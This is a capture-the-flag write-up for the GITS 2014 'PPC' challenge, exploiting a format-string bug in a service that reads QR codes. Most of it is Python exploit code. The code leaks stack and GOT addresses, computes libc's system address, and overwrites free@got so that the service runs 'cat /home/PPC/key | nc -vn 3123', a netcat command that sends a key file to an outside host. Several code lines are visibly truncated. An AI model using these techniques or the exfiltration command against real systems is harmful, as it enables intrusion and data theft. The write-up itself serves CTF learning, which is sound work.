GITS 2014 Teaser – PPC

Find the key. (File)
PPC running at

Summary: format string vuln, communication via qrcodes

The code is rather straightforward. It reads packed width/height of the image, receives image with colors converted to bits (instead of 0-255 values) and packed to bytes (each byte = 8 pixels of the image). Then it reads QRCodes from it and calls fprintf on each message. Here’s this part of code:

for ( i = zbar_image_first_symbol(0, &result_buf[v4]); i; i = zbar_symbol_next(i) )
  symbol_ptr = (char *)zbar_symbol_get_data(i);
  symbol_len = zbar_symbol_get_data_length(i);
  some_magic(result_buf, 32, symbol_ptr, symbol_len);
  fprintf(fd, result_buf);

There’s some_magic function which does some conversion and after looking closer it’s easy to see it’s actually base64decode. You can hope so until you find that it contains some mistakes:

  • buffer is zeroed only before reading the whole image, not each symbol and each 2,3 bytes are OR’ed with new data
  • the last byte (32nd) is decoded only partially – low 4 bits are always zeroes

That means we can’t easily use more than one qrcode in single image (we can use it only if the second value can be got by OR’ing the first with something) and that we have only 31 byte for formatstring.

Let’s first find argument number which points to our buffer. I used libformatstr for that:

import qrcode
from base64 import b64encode
from struct import pack
from sock import *
from libformatstr import *
def make_qr_data(s):
    qr = qrcode.QRCode(
    img = qr.make_image()._img
    w, h = img.size
    acc = res = ""
    for x in img.getdata():
        acc += str(x / 128)
        if len(acc) >= 8:
            res += chr(int(acc, 2))
            acc = ""
    if (w * h) & 7:
        res += "\xff"
    return pack("<2I", w, h) + res
def do_fmt(fmt):
    f = Sock("", timeout=100)
    # network problems
    for i in range(10):
    return f.read_one()
for i in range(0, 100, 3):
    s = make_pattern(30, start_index=i) + "\n"
    res = do_fmt(s)
    res = res[:res.find("\n")]
    print i, `res`
        argnum, padding = guess_argnum(res, 30, start_index=i)
        print argnum, padding

Result: argument number is 18.

It’s also easy to leak saved ebp and return address:

res = do_fmt("%33$08x:%34$08x:%35$08x\n")
print res

Result: bfc1a608:b77e9100:00000004.

Return address is 0xb77e9100, we know that should be return to serving function:

.text:000010FE                 call    eax
.text:00001100                 mov     [ebp+status], eax

So now we know image base (b77e8000), we know address of GOT entries. Let’s dump it:

base = 0xb77e9100 - 0x1100
got = base + 0x4000
res = do_fmt("%22$s".ljust(16, "|") + pack("<I", got) + "\n")
for addr in unpack("<4I", res[:16]):
    print hex(addr)



This addresses help us to identify libc, so we can calculate system address:

$ objdump -d | grep 'setsockopt>:'
000ec6d0 <setsockopt>:
$ objdump -d | grep 'system>:'
0003d170 <__libc_system>:

We will overwrite free@got with system, so we’ll get system(our_data):

ptr = byte_buf;
nread = read_all(fd, byte_buf, size);
if ( nread != size )
  result = 0;
  goto LABEL_30;

But there’s one problem.. We can’t use overwrite with two stages (images), because free is called between images, and this call will be corrupted. But straightforward overwrite takes 34 bytes:

got_free = got + 0x1c
libc = 0xb76d56d0 - 0x000ec6d0
system = libc + 0x0003d170
s = pack("<I", got_free)
s += pack("<I", got_free + 2)
s += "%" + str((system & 0xffff) - 8) + "c"
s += "%18$hn"
s += "%" + str((system >> 16) - (system & 0xffff)) + "c"
s += "%19$hn"
print len(s), `s`
# 34 bytes

We’ve managed to shrink it to 32 bytes, but because of the mistake in base64decode we need no more than 31 byte (or 32nd byte with zeroed lower bits).

But let’s allow us to make format string larger: there’s no explicit null termination, so we can extend our format string on the stack! Easier, we can save addresses to overwrite there, so the format string will be small enough itself:

sebp_serve = 0xbfc1a608
# serve stack frame: 0x24 + saved ebx (4) = 0x28
# sebp + retaddr = 8
ebp = sebp_serve - 0x28 - 0x8
ext_addr = ebp - 0x1c
f = Sock("", timeout=100)
# put addresses on stack
ext = pack("<I", got_free) + pack("<I", got_free + 2)
for i in range(0, len(ext), 2):
    word = ext[i:i+2]
    s = pack("<I", ext_addr + i)
    s += "%" + str(unpack("<H", word)[0] - 4) + "c"
    s += "%18$hn\n\x00"
# overwrite free to system
s = ""
s = "%" + str((system & 0xffff)) + "c"
s += "%26$hn"
s += "%" + str((system >> 16) - (system & 0xffff)) + "c"
s += "%27$hn\n"
# trigger free(cmd)
CMD = "cat /home/PPC/key | nc -vn 3123; #\x00"
for i in range(10):
    f.send(pack("<2I", 32, 16) + CMD.ljust(32 * 16 / 8))

Flag: 2011CTFMemesMadeNewAgain

PS: because of bug in read_all, if your pictures are not landing in one recv call, your format string won’t be called. So this exploit can be unreliable due to network issues.

1 comment

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